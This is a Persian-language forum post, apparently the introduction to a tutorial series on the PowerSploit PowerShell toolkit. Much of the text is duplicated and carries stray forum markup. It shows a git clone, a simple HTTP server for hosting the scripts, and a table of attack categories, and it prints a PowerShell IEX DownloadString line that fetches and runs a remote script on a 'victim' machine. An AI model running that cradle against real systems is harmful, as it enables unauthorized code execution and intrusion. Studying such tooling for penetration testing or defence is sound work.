با سلام خدمت شما دوستان عزیز
powersploit یک مجموعه ابزار از powershell است که متوان از آن برای انجام عمل اکسپلویتنگ، گسترش اکسپلویت و یا پن تست استفاده کرد.
برای دریافت آخرین نسخهی این مجموعه را میتوانید از این آدرس دریافت کنید: https://github.com/mattifestation/PowerSploit
اگر شما از git استفاده میکنید میتوانید به راحتی با استفاده از دستور زیر تمامی فایلهای آن را دریافت کنید:
[align=center][/align]برای استفاده از این مجموعه شما باید Microsoft PowerShell رو نصب داشته باشید. این ابزار در ویندوز 7 و بالاتر به صورت پیشفرض نصب شده و نیازی به نصب دوباره آن نیست.
در اینجا سناریوی ما به این صورت است که ما یک ریموت دسکتاپ کانکشن از سیستم قربانی داریم و قربانی هم PowerShell را نصب دارد و ما PowerSploit را روی سیستم قربانی اجرا میکنیم.
برای دسترسی راحت تر به این ابزار ما یک سرور ساده بر روی سیستم خود اجرا میکنیم که بتوانیم از طریق آن PowerSploit را روی سیستم قربانی نصب کنیم
[align=center][/align]
حال تمامی فایل های مورد نیاز PoweSploit در آدرس http://<ip_address>:8000 قابل دسترسی است.[align=center][/align]پاوراسپلویت تمامی ابزار های خودش را به صورت کاملا شفاف و واضح به صورت زیر دسته بندی کرده است.
نحوه نصب و اجرای پاوراسپلویت به صورت زیر است:
زمانی که این دستور اجرا شود پاوراسپلویت بر روی پاورشلی که فقط در حال اجرا است نصب میشود!!
ادامه دارد...
powersploit یک مجموعه ابزار از powershell است که متوان از آن برای انجام عمل اکسپلویتنگ، گسترش اکسپلویت و یا پن تست استفاده کرد.
برای دریافت آخرین نسخهی این مجموعه را میتوانید از این آدرس دریافت کنید: https://github.com/mattifestation/PowerSploit
اگر شما از git استفاده میکنید میتوانید به راحتی با استفاده از دستور زیر تمامی فایلهای آن را دریافت کنید:
کد:
git clone [url]https://github.com/mattifestation/PowerSploit.git[/url]
در اینجا سناریوی ما به این صورت است که ما یک ریموت دسکتاپ کانکشن از سیستم قربانی داریم و قربانی هم PowerShell را نصب دارد و ما PowerSploit را روی سیستم قربانی اجرا میکنیم.
برای دسترسی راحت تر به این ابزار ما یک سرور ساده بر روی سیستم خود اجرا میکنیم که بتوانیم از طریق آن PowerSploit را روی سیستم قربانی نصب کنیم
کد:
python -m SimpleHTTPServer
حال تمامی فایل های مورد نیاز PoweSploit در آدرس http://<ip_address>:8000 قابل دسترسی است.[align=center][/align]پاوراسپلویت تمامی ابزار های خودش را به صورت کاملا شفاف و واضح به صورت زیر دسته بندی کرده است.
Category | Description |
Antivirus Bypass | پیدا کردن بایتی که با امضاء یک ویروس مطابقت دارد و توسط آنتی ویروس شناسایی میشود! |
Code Execution | برای اجرای کد بر روی سیستم قربانی استفاده میشود |
Exfiltration | جمع آوری اطلاعات و داده ها از سیستم قربانی |
Persistence | حفظ دسترسی به سیستم قربانی |
PE Tools | Handy PowerShell cmdlets for enumeration. |
Recon | انجام کارهای شناسایی با استفاده از سیستم قربانی |
Reverse Engineering | راهنما انجام مهندسی معکوس و تجزیه و تحلیل نرم افزارهای مخرب. این در حال حاضر به PowerShellArsenal منتقل شده است |
Script Modification | ساخت و توسعه یک اسکریپت در سیستم قربانی |
کد:
IEX (New-Object Net.WebClient).DownloadString(“[url=http://%3Cip_address]http://<ip_address[/url]>/full_path/script_name.ps1”)
ادامه دارد...
نظر